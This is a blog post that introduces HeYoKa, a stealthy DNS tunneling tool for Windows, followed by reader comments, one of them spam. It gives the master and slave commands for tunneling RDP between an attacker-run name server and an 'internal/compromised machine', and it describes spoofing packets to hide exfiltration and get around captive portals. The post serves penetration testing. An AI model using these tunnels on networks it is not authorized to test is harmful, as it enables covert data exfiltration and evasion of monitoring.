Hi folks, today I tried for my first time HeYoKa. As you probably know utilizing Linux systems is pretty easy to build a DNS tunneling , faking up most of the captive portal around the globe, but what about windows ? Well, HeYoKa makes it easy.
Heyoka is a DNS tunneling tool aiming for both performance and stealth, released under the GPLv2.
The tunnel is up to 60% faster compared to existing tools, thanks to a different encoding that is used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.
Heyoka is 100% written in C, which means that it runs natively without the need of interpreters installed on the machine, which is extremely useful in a penetration testing scenario.
The overall idea is to create a useful tunneling tool, and at the same time investigate new patterns of data exfiltration that use spoofed packets to avoid detection.
We presented heyoka at multiple conferences. Have a look at the slides from Shakacon if you want to get a bigger picture … or just download and try! 🙂

How do I get heyoka to run?

Start by running heyoka in master mode on the machine which is authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g.: RDP), the syntax will be as follows:

heyoka.exe -m -d mydomain.com -l -p 8080

This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:

heyoka.exe -s -d mydomain.com -p 3389

This will create the tunnel, and all you have to do is to fire off a RDP client and point it to the ‘master’ machine on port 8080.

If it’s the internal/compromised machine that needs to contact a service on the external box, simply use ‘-l’ (which stands for ‘listen’) on the master side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.

Published by marcoramilli

Ethical Hacking, Advanced Targeted Attack Expert and Malware Evasion Expert

6 thoughts on “ DNS Tunneling: never so easy ”

  2. Hey,
    I have tried the way as per what the heyoka shows, but then I met a problem when I tried run it in master mode on the name server: bind failed. As follows:

    E:\>heyoka -m -d mydomain -l -p 8080
    [DEBUG] Starting server mode…
    [DEBUG]: Master starting for (master.out.com) listening on 53/UDP
    [ERROR]: bind failed
    (10048)
    [ERROR]: cannot create server udp socket

    Beforehand, I also met a big problem that heyoka seems not be compiled rightly(then I recompiled one) and cannot run in windows server 2003(This is instructed by heyoka!). I wanted to find something about this on the internet but got nothing..
    So didn't you met these problems? Hope for your reply, thx~

    piaomiaowuxing#gmail.com

  6. Hey

    You will not believe what I just found! [url=http://www.foolioo.com]Foolioo.com[/url] makes [url=http://www.foolioo.com]free[/url] custom website for free. Yep! That's right, FREE!
    Never figured out it'd be so easy to get a free website and I really had to tell you guys.

    So if you're looking for a free website, give these guys a try.

    Good Bye

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.